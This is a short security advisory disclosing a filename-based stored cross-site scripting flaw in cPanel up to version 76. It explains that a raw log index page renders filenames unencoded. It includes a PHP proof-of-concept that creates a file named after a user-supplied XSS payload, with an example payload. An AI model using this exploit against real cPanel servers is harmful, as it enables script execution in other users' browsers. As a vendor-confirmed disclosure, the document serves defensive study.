cPanel Filename Based Stored XSS <= v76

2018.08.14
Risk: Low
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

[+] Title: cPanel Filename Based Stored XSS <= v76
[+] Author: Numan OZDEMIR
[+] Vendor Homepage: cpanel.com
[+] Version: Up to v76.
[+] Discovered by Numan OZDEMIR in InfinitumIT Labs
[+] root@numanozdemir.com - info@infinitumit.com.tr

[~] Description:
An attacker can run JavaScript code on this page:
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html
The page lists the files in the account's /home/user/logs directory and renders each filename without HTML encoding, so a filename that contains markup is executed by the browser of whoever views the listing.

[~] How to Reproduce:
Create a file in the /home/user/logs directory whose name is your payload, or run this PHP exploit:

<center>
<?php
// Proof of concept: creates an empty file in the current user's logs
// directory whose name is the XSS payload; the raw log index then renders it.
$p = isset($_POST['payload']) ? $_POST['payload'] : '';
$x = get_current_user();
$dir = "/home/".$x."/logs/";
if($_POST){
    if(touch($dir.$p)){
        die('Successfully exploited. Visit <br> http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html');
    }else{
        die('An error occurred.');
    }
}else{
    echo 'Enter your payload: <form action="" method="post"><input type="text" name="payload" placeholder="<img src onerror=alert(2)>"> <input type="submit" value=">>"></form>';
}
// end of the script.
?>
</center>

Note: this exploit cannot create a file whose name contains a / (slash) character, because touch() treats the slash as a path separator; a single Unix filename can never contain / or NUL.
This vulnerability is disclosed with the cPanel team's confirmation.
// for secure days...
